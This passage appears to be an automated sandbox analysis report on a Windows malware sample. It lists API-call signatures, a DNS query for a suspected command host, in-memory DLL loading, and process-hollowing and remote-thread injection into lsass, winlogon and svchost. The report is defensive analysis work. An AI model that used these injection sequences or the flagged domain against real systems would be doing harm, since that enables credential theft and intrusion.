Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE868814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00000140AE868814
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE8684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00000140AE8684B0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00000140AE86CD80
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00000195DD5C8814
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000195DD5C84B0
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000195DD5CCD80
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000195DE1ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00000195DE1A8814
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000195DE1A84B0
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00000192913E84B0
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00000192913E8814
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00000192913ECD80
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192916284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00000192916284B0
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_0000019291628814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0000019291628814
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000001929162CD80
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00000139F96D8814
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000139F96DCD80
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000139F96D84B0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_000001160CB38814
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001160CB384B0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001160CB3CD80
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_000001160CB98814
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001160CB984B0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001160CB9CD80
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_000001160CBC8814
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001160CBC84B0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001160CBCCD80
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000257E10A84B0
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00000257E10A8814
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000257E10ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000257E10D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00000257E10D8814
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000257E10DCD80
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001428DD0CD80
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001428DD084B0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000001428DD08814
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001428DD3CD80
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001428DD384B0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000001428DD38814
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C9384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F28C9384B0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000001F28C938814
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F28C93CD80
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C9684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F28C9684B0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C968814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000001F28C968814
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F28C96CD80
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA985484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000001CA985484B0
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000001CA9854CD80
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA98548814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_000001CA98548814
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D2653184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000001D2653184B0
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000001D26531CD80
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D265318814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_000001D265318814
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D2653484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000001D2653484B0
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000001D26534CD80
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D265348814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_000001D265348814
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00000254A2D484B0
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00000254A2D48814
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00000254A2D4CD80
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DD84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0000024B87DD84B0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DD8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0000024B87DD8814
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0000024B87DDCD80
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0000024B8848CD80
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B88488814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_0000024B88488814
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B884884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0000024B884884B0
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00000205FD40CD80
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00000205FD4084B0
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD408814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00000205FD408814
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000001A2056ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000001A2056A84B0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_000001A2056A8814
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_0000018EC1F6CD80
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_0000018EC1F684B0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_0000018EC1F68814
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000025CE3E0CD80
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000025CE3E084B0
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_0000025CE3E08814
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE4178814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_0000025CE4178814
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE41784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000025CE41784B0
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000025CE417CD80

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: capacity-sg.gl.at.ply.gg

.NET source code references suspicious native API functions

Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

7_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 58952EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: ADFC2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: DD592EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: CD32EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E1072EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8C1D2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 97FD2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 652E2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A27C2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87DA2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FB3C2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5672EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C1F32EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E3BC2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 38952EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6E562EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1FF72EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F352EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 79572EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A462EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 13112EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8C582EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5F1D2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 58952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ADFC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CB62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E1072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 97FD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 652E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A27C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 87DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB3C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5672EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C1F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E3BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 38952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1FF72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 79572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A462EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13112EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AEC92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: DC1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 82532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: A62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 66EB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FD9A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CEDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 42792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B6F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8DCD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 73832EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F9DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CCC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 39D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA392EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B7272EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53B52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E88A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 77B52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B5E12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53C22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 41D42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ADAD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4DB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3312EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C5282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 76AA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F34B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DE4D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 74472EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A9D02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF8C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43DC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 97E32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC872EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 698D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 34C52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 84342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 58922EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B4702EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8A42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3F3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 87882EBC
